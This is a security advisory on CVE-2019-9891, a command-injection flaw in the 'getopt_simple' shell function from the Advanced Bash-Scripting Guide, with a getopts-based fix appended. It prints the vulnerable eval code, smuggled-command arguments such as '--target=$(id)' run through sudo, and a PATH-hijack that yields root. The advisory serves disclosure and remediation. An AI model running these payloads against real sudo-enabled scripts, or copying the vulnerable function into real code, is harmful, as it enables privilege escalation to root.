Advisory: Code Execution via Insecure Shell Function getopt_simple

RedTeam Pentesting discovered that the shell function "getopt_simple",
as presented in the "Advanced Bash-Scripting Guide", allows execution of
attacker-controlled commands.


Details
=======

Product: Advanced Bash-Scripting Guide
Affected Versions: all
Fixed Versions: -
Vulnerability Type: Code Execution
Security Risk: medium
Vendor URL:
Vendor Status: notified
Advisory URL:
Advisory Status: private
CVE: CVE-2019-9891
CVE URL:


Introduction
============

The document "Advanced Bash-Scripting Guide" [1] is a tutorial for
writing shell scripts for Bash. It contains many example scripts
together with in-depth explanations about how shell scripting works.


More Details
============

During a penetration test, RedTeam Pentesting was able to execute
commands as an unprivileged user (www-data) on a server. Among other
things, it was discovered that this user was permitted to run the shell
script "cleanup.sh" as root via "sudo":

------------------------------------------------------------------------
$ sudo -l
Matching Defaults entries for user on srv:
    env_reset, secure_path=/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on srv:
    (root) NOPASSWD: /usr/local/sbin/cleanup.sh
------------------------------------------------------------------------

The script "cleanup.sh" starts with the following code:

------------------------------------------------------------------------
#!/bin/bash

getopt_simple()
{
    until [ -z "$1" ]
    do
        if [ ${1:0:2} = '--' ]
        then
            tmp=${1:2}               # Strip off leading '--' . . .
            parameter=${tmp%%=*}     # Extract name.
            value=${tmp##*=}         # Extract value.
            eval $parameter=$value
        fi
        shift
    done
}

target=/tmp

# Pass all options to getopt_simple().
getopt_simple $*

# list files to clean
echo "listing files in $target"
find "$target" -mtime 1
------------------------------------------------------------------------

The function "getopt_simple" is used to set variables based on
command-line flags which are passed to the script. Calling the script
with the argument "--target=/tmp" sets the variable "$target" to the
value "/tmp". The variable's value is then used in a call to "find". The
source code of the "getopt_simple" function has been taken from the
"Advanced Bash-Scripting Guide" [2]. It was also published as a book.

RedTeam Pentesting identified two different ways to exploit this
function in order to run attacker-controlled commands as root.

First, a flag can be specified in which either the name or the value
contains a shell command. The call to "eval" will simply execute this
command.

------------------------------------------------------------------------
$ sudo /usr/local/sbin/cleanup.sh '--redteam=foo;id'
uid=0(root) gid=0(root) groups=0(root)
listing files in /tmp

$ sudo /usr/local/sbin/cleanup.sh '--target=$(id)'
listing files in uid=0(root) gid=0(root) groups=0(root)
find: 'uid=0(root) gid=0(root) groups=0(root)': No such file or directory

$ sudo /usr/local/sbin/cleanup.sh '--target=$(ls${IFS}/)'
listing files in bin
boot
dev
etc
[...]
------------------------------------------------------------------------

Instead of injecting shell commands, the script can also be exploited by
overwriting the "$PATH" variable:

------------------------------------------------------------------------
$ mkdir /tmp/redteam
$ cat <<EOF > /tmp/redteam/find
#!/bin/sh
echo "executed as root:"
/usr/bin/id
EOF
$ chmod +x /tmp/redteam/find
$ sudo /usr/local/sbin/cleanup.sh --PATH=/tmp/redteam
listing files in /tmp
executed as root:
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------------------


Workaround
==========

No workaround available.


Fix
===

Replace the function "getopt_simple" with the built-in function
"getopts" or the program "getopt" from the util-linux package.
Examples on how to do so are included in the same tutorial [3][4].


Security Risk
=============

If a script with attacker-controlled arguments uses the "getopt_simple"
function, arbitrary commands may be invoked by the attackers. This is
particularly interesting if a privilege boundary is crossed, for example
in the context of "sudo". Overall, this vulnerability is rated as a
medium risk.


Timeline
========

2019-02-18 Vulnerability identified
2019-03-20 Customer approved disclosure to vendor
2019-03-20 Author notified
2019-03-20 Author responded, document is not updated/maintained any more
2019-03-20 CVE ID requested
2019-03-21 CVE ID assigned
2019-03-26 Advisory released


References
==========

[1]
[2]
[3]
[4]


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants
to share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
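To illustrate the Fix section above, the following is an added example (written for this page, not taken from the advisory or from the "Advanced Bash-Scripting Guide") of the "cleanup.sh" prologue rewritten with the shell built-in "getopts". The short option "-t" and the function names "parse_options" and "list_files" are assumptions made here; the default target "/tmp" and the "find" call follow the original script. The essential difference from "getopt_simple" is that the option value is assigned as a plain string and never passed to "eval", and that only the one variable the script expects can be set from the command line.

```bash
#!/bin/bash
# Added example, not code from the advisory or the guide: the
# "cleanup.sh" option handling rebuilt on the getopts built-in.
# Assumed interface: "-t DIR" selects the directory to list.

parse_options() {
    target=/tmp          # default, as in the original script
    OPTIND=1             # reset so the function can be called more than once
    local opt
    # ":t:" -> "-t" takes a value; the leading ":" selects silent error
    # reporting so the error cases below are handled by this script.
    while getopts ":t:" opt "$@"; do
        case "$opt" in
            t)  target=$OPTARG ;;      # plain assignment, no eval
            :)  echo "option -$OPTARG requires a value" >&2; return 2 ;;
            \?) echo "unknown option -$OPTARG" >&2; return 2 ;;
        esac
    done
    shift $((OPTIND - 1))
    # Reject leftover positional arguments instead of silently ignoring
    # them, so unexpected input is visible.
    [ $# -eq 0 ] || { echo "unexpected argument: $1" >&2; return 2; }
    return 0
}

# Same job as the tail of the original script, now fed by parse_options.
# PATH (or any other variable) cannot be overwritten through the
# arguments, because no argument is ever interpreted as a variable name.
list_files() {
    parse_options "$@" || return $?
    echo "listing files in $target"
    find "$target" -mtime 1
}

# Demonstration with the advisory's payloads: the value stays a literal
# string, and the PATH override is rejected as an unknown option.
parse_options -t '$(id)' && echo "target is the literal string: $target"
parse_options --PATH=/tmp/redteam || echo "rejected; PATH is still: $PATH"
```

"getopts" only understands short options, so a script that must keep accepting "--target=DIR" would use the util-linux "getopt" program instead, as the tutorial's own example [4] does; the important property is the same in both cases: option values are stored, not evaluated.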